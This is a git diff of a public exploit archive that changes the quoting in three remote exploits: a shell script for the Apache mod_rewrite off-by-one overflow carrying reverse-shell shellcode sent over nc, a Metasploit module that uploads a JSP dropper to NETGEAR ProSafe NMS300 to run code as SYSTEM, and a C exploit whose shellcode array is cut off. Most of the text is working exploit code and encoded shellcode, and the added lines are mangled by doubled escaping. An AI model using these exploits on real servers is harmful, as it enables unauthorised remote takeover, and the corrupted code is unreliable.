 # 2006-08-20
 # http://www.milw0rm.com/exploits/2237
 #
@@ -40,7 +40,7 @@
 # [httpd.conf]:
 # RewriteEngine on
 # RewriteRule 1/(.*) $1
-# RewriteLog "logs/rewrite.log"
+# RewriteLog \"logs/rewrite.log\"
 # RewriteLogLevel 3
 # 
 # 
@@ -54,7 +54,7 @@
 # Microsoft Windows [¡ã?¡À? 5.2.3790]
 # (C) ¡ã?¨¨¡§?¨´¨®D 1985-2003 Microsoft Corp.
 # 
-# D:\Apache\Apache2>exit
+# D:\\Apache\\Apache2>exit
 # exit
 #  sent 5, rcvd 100
 # 
@@ -66,67 +66,67 @@
 #
 
 
-echo -e "mod_rewrite apache off-by-one overflow"
+echo -e \"mod_rewrite apache off-by-one overflow\"
 
 
 if [ $# -ne 1 ] ; then
-  echo "Usage: $0 webserver"
+  echo \"Usage: $0 webserver\"
   exit
 fi
 
 host=$1
 
-#use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string
-echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\  
+#use ldap:// to trigger the vuln, \"Ph4nt0m\" is any arbitrary string
+echo -ne \"GET /1/ldap://ph4nt0m/`perl -e \'print \"Ph4nt0m\"x5\'`\\  
 # %3f to trigger the vuln
-%3fA%3fA%3f\    
-#string "CCCC.." is any arbitrary string, use %3f to trigger the vuln
+%3fA%3fA%3f\\    
+#string \"CCCC..\" is any arbitrary string, use %3f to trigger the vuln
 #%90 is the machine code we will jmp to(NOP),run shellcode from here
-`perl -e 'print "C"x10'`%3fC%3f%90\    
+`perl -e \'print \"C\"x10\'`%3fC%3f%90\\    
 # shellcode,reverse shell to 192.168.0.1 ,port 1154  alpha2 encoded
-`perl -e 'print "\    
-\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\
-\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63\
-\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x42\x32\x42\x41\x41\x32\
-\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x79\x6c\x51\
-\x7a\x6a\x4b\x50\x4d\x4d\x38\x6b\x49\x79\x6f\x49\x6f\x6b\x4f\x65\
-\x30\x4c\x4b\x72\x4c\x45\x74\x51\x34\x4e\x6b\x71\x55\x77\x4c\x6c\
-\x4b\x33\x4c\x64\x45\x33\x48\x64\x41\x5a\x4f\x4c\x4b\x72\x6f\x36\
-\x78\x4c\x4b\x73\x6f\x45\x70\x66\x61\x4a\x4b\x53\x79\x4e\x6b\x44\
-\x74\x4e\x6b\x73\x31\x38\x6e\x55\x61\x79\x50\x6c\x59\x6c\x6c\x4b\
-\x34\x6f\x30\x74\x34\x34\x47\x59\x51\x5a\x6a\x76\x6d\x76\x61\x6f\
-\x32\x5a\x4b\x79\x64\x55\x6b\x33\x64\x51\x34\x41\x38\x30\x75\x4b\
-\x55\x6e\x6b\x33\x6f\x44\x64\x46\x61\x7a\x4b\x32\x46\x6e\x6b\x34\
-\x4c\x42\x6b\x6e\x6b\x73\x6f\x77\x6c\x54\x41\x58\x6b\x43\x33\x74\
-\x6c\x6c\x4b\x4d\x59\x50\x6c\x74\x64\x75\x4c\x52\x41\x6f\x33\x50\
-\x31\x6b\x6b\x72\x44\x4c\x4b\x50\x43\x66\x50\x6c\x4b\x33\x70\x64\
-\x4c\x6c\x4b\x74\x30\x65\x4c\x4e\x4d\x4e\x6b\x53\x70\x47\x78\x33\
-\x6e\x51\x78\x4c\x4e\x52\x6e\x56\x6e\x58\x6c\x50\x50\x59\x6f\x79\
-\x46\x70\x66\x62\x73\x75\x36\x75\x38\x66\x53\x64\x72\x42\x48\x53\
-\x47\x32\x53\x50\x32\x71\x4f\x71\x44\x49\x6f\x48\x50\x52\x48\x5a\
-\x6b\x48\x6d\x6b\x4c\x65\x6b\x70\x50\x4b\x4f\x68\x56\x61\x4f\x4e\
-\x69\x4a\x45\x30\x66\x6e\x61\x78\x6d\x67\x78\x73\x32\x42\x75\x52\
-\x4a\x75\x52\x6b\x4f\x7a\x70\x61\x78\x6b\x69\x55\x59\x6c\x35\x6e\
-\x4d\x51\x47\x4b\x4f\x4e\x36\x70\x53\x50\x53\x56\x33\x76\x33\x43\
-\x73\x32\x73\x31\x53\x52\x73\x6b\x4f\x4a\x70\x70\x68\x6f\x30\x6d\
-\x78\x35\x50\x46\x61\x30\x66\x30\x68\x76\x64\x6c\x42\x33\x56\x70\
-\x53\x4e\x69\x78\x61\x4c\x55\x75\x38\x4a\x4c\x58\x79\x4c\x6a\x73\
-\x50\x53\x67\x6b\x4f\x6a\x76\x73\x5a\x72\x30\x73\x61\x53\x65\x4b\
-\x4f\x6a\x70\x52\x46\x31\x7a\x52\x44\x73\x56\x50\x68\x51\x73\x50\
-\x6d\x32\x4a\x62\x70\x51\x49\x47\x59\x6a\x6c\x6c\x49\x4b\x57\x42\
-\x4a\x73\x74\x6d\x59\x6d\x32\x35\x61\x6f\x30\x48\x73\x4f\x5a\x6f\
-\x65\x4c\x49\x39\x6d\x4b\x4e\x33\x72\x54\x6d\x6b\x4e\x33\x72\x34\
-\x6c\x6c\x4d\x50\x7a\x57\x48\x4e\x4b\x4c\x6b\x6c\x6b\x71\x78\x32\
-\x52\x6b\x4e\x6c\x73\x42\x36\x49\x6f\x73\x45\x65\x78\x6b\x4f\x6e\
-\x36\x71\x4b\x42\x77\x43\x62\x53\x61\x76\x31\x70\x51\x30\x6a\x35\
-\x51\x62\x71\x76\x31\x72\x75\x43\x61\x4b\x4f\x6e\x30\x73\x58\x4e\
-\x4d\x7a\x79\x37\x75\x38\x4e\x31\x43\x4b\x4f\x4a\x76\x30\x6a\x39\
-\x6f\x6b\x4f\x70\x37\x6b\x4f\x6e\x30\x45\x38\x39\x77\x54\x39\x79\
-\x56\x71\x69\x79\x6f\x53\x45\x56\x64\x69\x6f\x69\x46\x6b\x4f\x62\
-\x57\x6b\x4c\x4b\x4f\x6a\x70\x50\x68\x6a\x50\x6f\x7a\x37\x74\x43\
-\x6f\x72\x73\x4b\x4f\x6a\x76\x79\x6f\x38\x50\x63\
-"'`\
-HTTP/1.0\r\n\
-Host: $host\r\n\r\n" | nc -vv $host 80
+`perl -e \'print \"\\    
+\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\\
+\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x51\\x5a\\x6a\\x63\\
+\\x58\\x30\\x42\\x30\\x50\\x42\\x6b\\x42\\x41\\x73\\x42\\x32\\x42\\x41\\x41\\x32\\
+\\x41\\x41\\x30\\x41\\x41\\x58\\x50\\x38\\x42\\x42\\x75\\x69\\x79\\x79\\x6c\\x51\\
+\\x7a\\x6a\\x4b\\x50\\x4d\\x4d\\x38\\x6b\\x49\\x79\\x6f\\x49\\x6f\\x6b\\x4f\\x65\\
+\\x30\\x4c\\x4b\\x72\\x4c\\x45\\x74\\x51\\x34\\x4e\\x6b\\x71\\x55\\x77\\x4c\\x6c\\
+\\x4b\\x33\\x4c\\x64\\x45\\x33\\x48\\x64\\x41\\x5a\\x4f\\x4c\\x4b\\x72\\x6f\\x36\\
+\\x78\\x4c\\x4b\\x73\\x6f\\x45\\x70\\x66\\x61\\x4a\\x4b\\x53\\x79\\x4e\\x6b\\x44\\
+\\x74\\x4e\\x6b\\x73\\x31\\x38\\x6e\\x55\\x61\\x79\\x50\\x6c\\x59\\x6c\\x6c\\x4b\\
+\\x34\\x6f\\x30\\x74\\x34\\x34\\x47\\x59\\x51\\x5a\\x6a\\x76\\x6d\\x76\\x61\\x6f\\
+\\x32\\x5a\\x4b\\x79\\x64\\x55\\x6b\\x33\\x64\\x51\\x34\\x41\\x38\\x30\\x75\\x4b\\
+\\x55\\x6e\\x6b\\x33\\x6f\\x44\\x64\\x46\\x61\\x7a\\x4b\\x32\\x46\\x6e\\x6b\\x34\\
+\\x4c\\x42\\x6b\\x6e\\x6b\\x73\\x6f\\x77\\x6c\\x54\\x41\\x58\\x6b\\x43\\x33\\x74\\
+\\x6c\\x6c\\x4b\\x4d\\x59\\x50\\x6c\\x74\\x64\\x75\\x4c\\x52\\x41\\x6f\\x33\\x50\\
+\\x31\\x6b\\x6b\\x72\\x44\\x4c\\x4b\\x50\\x43\\x66\\x50\\x6c\\x4b\\x33\\x70\\x64\\
+\\x4c\\x6c\\x4b\\x74\\x30\\x65\\x4c\\x4e\\x4d\\x4e\\x6b\\x53\\x70\\x47\\x78\\x33\\
+\\x6e\\x51\\x78\\x4c\\x4e\\x52\\x6e\\x56\\x6e\\x58\\x6c\\x50\\x50\\x59\\x6f\\x79\\
+\\x46\\x70\\x66\\x62\\x73\\x75\\x36\\x75\\x38\\x66\\x53\\x64\\x72\\x42\\x48\\x53\\
+\\x47\\x32\\x53\\x50\\x32\\x71\\x4f\\x71\\x44\\x49\\x6f\\x48\\x50\\x52\\x48\\x5a\\
+\\x6b\\x48\\x6d\\x6b\\x4c\\x65\\x6b\\x70\\x50\\x4b\\x4f\\x68\\x56\\x61\\x4f\\x4e\\
+\\x69\\x4a\\x45\\x30\\x66\\x6e\\x61\\x78\\x6d\\x67\\x78\\x73\\x32\\x42\\x75\\x52\\
+\\x4a\\x75\\x52\\x6b\\x4f\\x7a\\x70\\x61\\x78\\x6b\\x69\\x55\\x59\\x6c\\x35\\x6e\\
+\\x4d\\x51\\x47\\x4b\\x4f\\x4e\\x36\\x70\\x53\\x50\\x53\\x56\\x33\\x76\\x33\\x43\\
+\\x73\\x32\\x73\\x31\\x53\\x52\\x73\\x6b\\x4f\\x4a\\x70\\x70\\x68\\x6f\\x30\\x6d\\
+\\x78\\x35\\x50\\x46\\x61\\x30\\x66\\x30\\x68\\x76\\x64\\x6c\\x42\\x33\\x56\\x70\\
+\\x53\\x4e\\x69\\x78\\x61\\x4c\\x55\\x75\\x38\\x4a\\x4c\\x58\\x79\\x4c\\x6a\\x73\\
+\\x50\\x53\\x67\\x6b\\x4f\\x6a\\x76\\x73\\x5a\\x72\\x30\\x73\\x61\\x53\\x65\\x4b\\
+\\x4f\\x6a\\x70\\x52\\x46\\x31\\x7a\\x52\\x44\\x73\\x56\\x50\\x68\\x51\\x73\\x50\\
+\\x6d\\x32\\x4a\\x62\\x70\\x51\\x49\\x47\\x59\\x6a\\x6c\\x6c\\x49\\x4b\\x57\\x42\\
+\\x4a\\x73\\x74\\x6d\\x59\\x6d\\x32\\x35\\x61\\x6f\\x30\\x48\\x73\\x4f\\x5a\\x6f\\
+\\x65\\x4c\\x49\\x39\\x6d\\x4b\\x4e\\x33\\x72\\x54\\x6d\\x6b\\x4e\\x33\\x72\\x34\\
+\\x6c\\x6c\\x4d\\x50\\x7a\\x57\\x48\\x4e\\x4b\\x4c\\x6b\\x6c\\x6b\\x71\\x78\\x32\\
+\\x52\\x6b\\x4e\\x6c\\x73\\x42\\x36\\x49\\x6f\\x73\\x45\\x65\\x78\\x6b\\x4f\\x6e\\
+\\x36\\x71\\x4b\\x42\\x77\\x43\\x62\\x53\\x61\\x76\\x31\\x70\\x51\\x30\\x6a\\x35\\
+\\x51\\x62\\x71\\x76\\x31\\x72\\x75\\x43\\x61\\x4b\\x4f\\x6e\\x30\\x73\\x58\\x4e\\
+\\x4d\\x7a\\x79\\x37\\x75\\x38\\x4e\\x31\\x43\\x4b\\x4f\\x4a\\x76\\x30\\x6a\\x39\\
+\\x6f\\x6b\\x4f\\x70\\x37\\x6b\\x4f\\x6e\\x30\\x45\\x38\\x39\\x77\\x54\\x39\\x79\\
+\\x56\\x71\\x69\\x79\\x6f\\x53\\x45\\x56\\x64\\x69\\x6f\\x69\\x46\\x6b\\x4f\\x62\\
+\\x57\\x6b\\x4c\\x4b\\x4f\\x6a\\x70\\x50\\x68\\x6a\\x50\\x6f\\x7a\\x37\\x74\\x43\\
+\\x6f\\x72\\x73\\x4b\\x4f\\x6a\\x76\\x79\\x6f\\x38\\x50\\x63\\
+\"\'`\\
+HTTP/1.0\\r\\n\\
+Host: $host\\r\\n\\r\\n\" | nc -vv $host 80
 
 # milw0rm.com [2007-04-07]
diff --git a/platforms/windows/remote/39515.rb b/platforms/windows/remote/39515.rb
index a5c3c53e8..431207803 100755
--- a/platforms/windows/remote/39515.rb
+++ b/platforms/windows/remote/39515.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
+require \'msf/core\'
 
 class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -13,9 +13,9 @@ class Metasploit4 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
-      'Description' => %q{
-        Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
+      \'Name\'        => \'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload\',
+      \'Description\' => %q{
+        Netgear\'s ProSafe NMS300 is a network management utility that runs on Windows systems.
         The application has a file upload vulnerability that can be exploited by an
         unauthenticated remote attacker to execute code as the SYSTEM user.
         Two servlets are vulnerable, FileUploadController (located at
@@ -23,41 +23,41 @@ class Metasploit4 < Msf::Exploit::Remote
         This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
         1.1.0.13.
       },
-      'Author' =>
+      \'Author\' =>
         [
-          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
+          \'Pedro Ribeiro <pedrib[at]gmail.com>\' # Vulnerability discovery and updated MSF module
         ],
-      'License' => MSF_LICENSE,
-      'References' =>
+      \'License\' => MSF_LICENSE,
+      \'References\' =>
         [
-          ['CVE', '2016-1525'],
-          ['US-CERT-VU', '777024'],
-          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
-          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30']
+          [\'CVE\', \'2016-1525\'],
+          [\'US-CERT-VU\', \'777024\'],
+          [\'URL\', \'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt\'],
+          [\'URL\', \'http://seclists.org/fulldisclosure/2016/Feb/30\']
         ],
-      'DefaultOptions' => { 'WfsDelay' => 5 },
-      'Platform' => 'win',
-      'Arch' => ARCH_X86,
-      'Privileged' => true,
-      'Targets' =>
+      \'DefaultOptions\' => { \'WfsDelay\' => 5 },
+      \'Platform\' => \'win\',
+      \'Arch\' => ARCH_X86,
+      \'Privileged\' => true,
+      \'Targets\' =>
         [
-          [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ]
+          [ \'NETGEAR ProSafe Network Management System 300 / Windows\', {} ]
         ],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => 'Feb 4 2016'))
+      \'DefaultTarget\' => 0,
+      \'DisclosureDate\' => \'Feb 4 2016\'))
 
     register_options(
       [
         Opt::RPORT(8080),
-        OptString.new('TARGETURI', [true,  "Application path", '/'])
+        OptString.new(\'TARGETURI\', [true,  \"Application path\", \'/\'])
       ], self.class)
   end
 
 
   def check
     res = send_request_cgi({
-      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
-      'method' => 'GET'
+      \'uri\'    => normalize_uri(datastore[\'TARGETURI\'], \'fileUpload.do\'),
+      \'method\' => \'GET\'
     })
     if res && res.code == 405
       Exploit::CheckCode::Detected
@@ -72,24 +72,24 @@ class Metasploit4 < Msf::Exploit::Remote
     base64_exe = Rex::Text.encode_base64(exe)
     payload_name = rand_text_alpha(rand(6)+3)
 
-    var_raw     = 'a' + rand_text_alpha(rand(8) + 3)
-    var_ostream = 'b' + rand_text_alpha(rand(8) + 3)
-    var_buf     = 'c' + rand_text_alpha(rand(8) + 3)
-    var_decoder = 'd' + rand_text_alpha(rand(8) + 3)
-    var_tmp     = 'e' + rand_text_alpha(rand(8) + 3)
-    var_path    = 'f' + rand_text_alpha(rand(8) + 3)
-    var_proc2   = 'e' + rand_text_alpha(rand(8) + 3)
+    var_raw     = \'a\' + rand_text_alpha(rand(8) + 3)
+    var_ostream = \'b\' + rand_text_alpha(rand(8) + 3)
+    var_buf     = \'c\' + rand_text_alpha(rand(8) + 3)
+    var_decoder = \'d\' + rand_text_alpha(rand(8) + 3)
+    var_tmp     = \'e\' + rand_text_alpha(rand(8) + 3)
+    var_path    = \'f\' + rand_text_alpha(rand(8) + 3)
+    var_proc2   = \'e\' + rand_text_alpha(rand(8) + 3)
 
     jsp = %Q|
-    <%@page import="java.io.*"%>
-    <%@page import="sun.misc.BASE64Decoder"%>
+    <%@page import=\"java.io.*\"%>
+    <%@page import=\"sun.misc.BASE64Decoder\"%>
     <%
     try {
-      String #{var_buf} = "#{base64_exe}";
+      String #{var_buf} = \"#{base64_exe}\";
       BASE64Decoder #{var_decoder} = new BASE64Decoder();
       byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
 
-      File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");
+      File #{var_tmp} = File.createTempFile(\"#{payload_name}\", \".exe\");
       String #{var_path} = #{var_tmp}.getAbsolutePath();
 
       BufferedOutputStream #{var_ostream} =
@@ -102,7 +102,7 @@ class Metasploit4 < Msf::Exploit::Remote
     %>
     |
 
-    jsp.gsub!(/[\n\t\r]/, '')
+    jsp.gsub!(/[\\n\\t\\r]/, \'\')
 
     return jsp
   end
@@ -112,31 +112,31 @@ class Metasploit4 < Msf::Exploit::Remote
     jsp_payload = generate_jsp_payload
 
     jsp_name = Rex::Text.rand_text_alpha(8+rand(8))
-    jsp_full_name = "null#{jsp_name}.jsp"
+    jsp_full_name = \"null#{jsp_name}.jsp\"
     post_data = Rex::MIME::Message.new
-    post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"')
+    post_data.add_part(jsp_name, nil, nil, \'form-data; name=\"name\"\')
     post_data.add_part(jsp_payload,
-      "application/octet-stream", 'binary',
-      "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"")
+      \"application/octet-stream\", \'binary\',
+      \"form-data; name=\\\"Filedata\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\\\"\")
     data = post_data.to_s
 
-    print_status("#{peer} - Uploading payload...")
+    print_status(\"#{peer} - Uploading payload...\")
     res = send_request_cgi({
-      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
-      'method' => 'POST',
-      'data'   => data,
-      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
+      \'uri\'    => normalize_uri(datastore[\'TARGETURI\'], \'fileUpload.do\'),
+      \'method\' => \'POST\',
+      \'data\'   => data,
+      \'ctype\'  => \"multipart/form-data; boundary=#{post_data.bound}\"
     })
-    if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/
-      print_status("#{peer} - Payload uploaded successfully")
+    if res && res.code == 200 && res.body.to_s =~ /{\"success\":true, \"file\":\"#{jsp_name}.jsp\"}/
+      print_status(\"#{peer} - Payload uploaded successfully\")
     else
-      fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
+      fail_with(Failure::Unknown, \"#{peer} - Payload upload failed\")
     end
 
-    print_status("#{peer} - Executing payload...")
+    print_status(\"#{peer} - Executing payload...\")
     send_request_cgi({
-      'uri'    => normalize_uri(datastore['TARGETURI'], jsp_full_name),
-      'method' => 'GET'
+      \'uri\'    => normalize_uri(datastore[\'TARGETURI\'], jsp_full_name),
+      \'method\' => \'GET\'
     })
     handler
   end
diff --git a/platforms/windows/remote/3996.c b/platforms/windows/remote/3996.c
index 6f96092d1..d4f4b1bc5 100755
--- a/platforms/windows/remote/3996.c
+++ b/platforms/windows/remote/3996.c
@@ -28,7 +28,7 @@ Example: ./apache 192.168.0.253 test
 Microsoft Windows [Version 5.2.3790]
 (C) Copyright 1985-2003 Microsoft Corp.
 
-C:\Program Files\Apache Group\Apache2>exit
+C:\\Program Files\\Apache Group\\Apache2>exit
 exit
 [+]Owned
 */
@@ -45,75 +45,75 @@ exit
 #define PORT 80 
 #define PORT2 4444
 #define MAXDATASIZE 1024
-char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
+char get[] = \"/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90\";
 char shellcode[]= 
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-"\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
-"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x41\x41\x32\x42"
-"\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x49\x4b\x58\x56"
-"\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x56\x31\x47\x4c"
-"\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x6c\x4c\x4b\x61"
-"\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x4a\x37\x68\x6c"
-"\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x72\x30\x49\x6e"
-"\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x6f\x6b\x4c\x70"
-"\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x37\x6b\x71\x68"
-"\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x6b\x73\x4c\x31"
-"\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x74\x56\x61\x7a"
-"\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x5a\x75\x4c\x67"
-"\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x58\x68\x6b\x76"
-"\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x6b\x4b\x72\x65"
-"\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x64\x4e\x6b\x74"
-"\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x6c\x4c\x4b\x35"
-"\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x4e\x70\x4e\x44"
-"\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x31\x78\x6c\x33"
-"\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x43\x4d\x59\x69"
-"\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x70\x45\x51\x33"
-"\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x74\x45\x49\x54"
-"\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x64\x35\x4a\x52"
-"\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x69\x45\x59\x49"
-"\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x47\x50\x53\x74"
-"\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x4d\x42\x6b\x75"
-"\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x79\x4f\x33\x4e"
-"\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x51\x66\x33\x4b"
-"\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x59\x6e\x69\x47"
-"\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x74\x39\x6f\x76"
-"\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x50\x30\x50\x50"
-"\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x6f\x63\x65\x66"
-"\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x43\x42\x48\x54"
-"\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x4a\x32\x30\x32"
-"\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x57\x4b\x4f\x72"
-"\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x65\x67\x50\x4c"
-"\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x30\x33\x30\x4e"
-"\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x50\x33\x30\x33"
-"\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x61\x4a\x4c\x67"
-"\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41";
+\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\"
+\"\\x48\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x41\"
+\"\\x58\\x50\\x30\\x42\\x30\\x41\\x6b\\x41\\x41\\x51\\x41\\x32\\x41\\x41\\x32\\x42\"
+\"\\x42\\x42\\x30\\x42\\x41\\x58\\x38\\x41\\x42\\x50\\x75\\x7a\\x49\\x4b\\x58\\x56\"
+\"\\x36\\x73\\x30\\x43\\x30\\x75\\x50\\x70\\x53\\x66\\x35\\x70\\x56\\x31\\x47\\x4c\"
+\"\\x4b\\x50\\x6c\\x44\\x64\\x55\\x48\\x6c\\x4b\\x73\\x75\\x75\\x6c\\x4c\\x4b\\x61\"
+\"\\x44\\x73\\x35\\x63\\x48\\x35\\x51\\x4b\\x5a\\x6c\\x4b\\x50\\x4a\\x37\\x68\\x6c\"
+\"\\x4b\\x42\\x7a\\x77\\x50\\x37\\x71\\x4a\\x4b\\x6b\\x53\\x44\\x72\\x30\\x49\\x6e\"
+\"\\x6b\\x44\\x74\\x6e\\x6b\\x56\\x61\\x68\\x6e\\x54\\x71\\x39\\x6f\\x6b\\x4c\\x70\"
+\"\\x31\\x4b\\x70\\x6c\\x6c\\x67\\x48\\x6b\\x50\\x54\\x34\\x53\\x37\\x6b\\x71\\x68\"
+\"\\x4f\\x44\\x4d\\x73\\x31\\x78\\x47\\x38\\x6b\\x38\\x72\\x45\\x6b\\x73\\x4c\\x31\"
+\"\\x34\\x46\\x74\\x52\\x55\\x6b\\x51\\x6c\\x4b\\x63\\x6a\\x65\\x74\\x56\\x61\\x7a\"
+\"\\x4b\\x32\\x46\\x4c\\x4b\\x76\\x6c\\x70\\x4b\\x4e\\x6b\\x30\\x5a\\x75\\x4c\\x67\"
+\"\\x71\\x5a\\x4b\\x6e\\x6b\\x74\\x44\\x4e\\x6b\\x57\\x71\\x6b\\x58\\x68\\x6b\\x76\"
+\"\\x62\\x50\\x31\\x4b\\x70\\x33\\x6f\\x53\\x6e\\x31\\x4d\\x63\\x6b\\x4b\\x72\\x65\"
+\"\\x58\\x55\\x50\\x61\\x4e\\x31\\x7a\\x36\\x50\\x42\\x79\\x70\\x64\\x4e\\x6b\\x74\"
+\"\\x59\\x6e\\x6b\\x43\\x6b\\x44\\x4c\\x4c\\x4b\\x51\\x4b\\x77\\x6c\\x4c\\x4b\\x35\"
+\"\\x4b\\x6e\\x6b\\x31\\x4b\\x74\\x48\\x73\\x63\\x63\\x58\\x6c\\x4e\\x70\\x4e\\x44\"
+\"\\x4e\\x78\\x6c\\x79\\x6f\\x4b\\x66\\x4d\\x59\\x6f\\x37\\x4b\\x31\\x78\\x6c\\x33\"
+\"\\x30\\x77\\x71\\x73\\x30\\x47\\x70\\x36\\x37\\x53\\x66\\x51\\x43\\x4d\\x59\\x69\"
+\"\\x75\\x39\\x78\\x56\\x47\\x57\\x70\\x37\\x70\\x37\\x70\\x6e\\x70\\x45\\x51\\x33\"
+\"\\x30\\x37\\x70\\x4c\\x76\\x72\\x39\\x55\\x48\\x7a\\x47\\x6d\\x74\\x45\\x49\\x54\"
+\"\\x30\\x4d\\x39\\x38\\x65\\x77\\x39\\x4b\\x36\\x50\\x49\\x6c\\x64\\x35\\x4a\\x52\"
+\"\\x50\\x4f\\x37\\x6c\\x64\\x4c\\x6d\\x76\\x4e\\x4d\\x39\\x4b\\x69\\x45\\x59\\x49\"
+\"\\x65\\x4e\\x4d\\x78\\x4b\\x4a\\x4d\\x6b\\x4c\\x77\\x4b\\x31\\x47\\x50\\x53\\x74\"
+\"\\x72\\x61\\x4f\\x46\\x53\\x67\\x42\\x57\\x70\\x61\\x4b\\x6c\\x4d\\x42\\x6b\\x75\"
+\"\\x70\\x70\\x51\\x6b\\x4f\\x7a\\x77\\x4b\\x39\\x4b\\x6f\\x4f\\x79\\x4f\\x33\\x4e\"
+\"\\x6d\\x71\\x65\\x52\\x34\\x53\\x5a\\x53\\x37\\x30\\x59\\x50\\x51\\x66\\x33\\x4b\"
+\"\\x4f\\x55\\x64\\x4c\\x4f\\x6b\\x4f\\x66\\x35\\x43\\x34\\x50\\x59\\x6e\\x69\\x47\"
+\"\\x74\\x6c\\x4e\\x6a\\x42\\x58\\x72\\x54\\x6b\\x64\\x67\\x72\\x74\\x39\\x6f\\x76\"
+\"\\x57\\x6b\\x4f\\x50\\x55\\x44\\x70\\x30\\x31\\x4b\\x70\\x50\\x50\\x30\\x50\\x50\"
+\"\\x50\\x32\\x70\\x77\\x30\\x46\\x30\\x53\\x70\\x70\\x50\\x49\\x6f\\x63\\x65\\x66\"
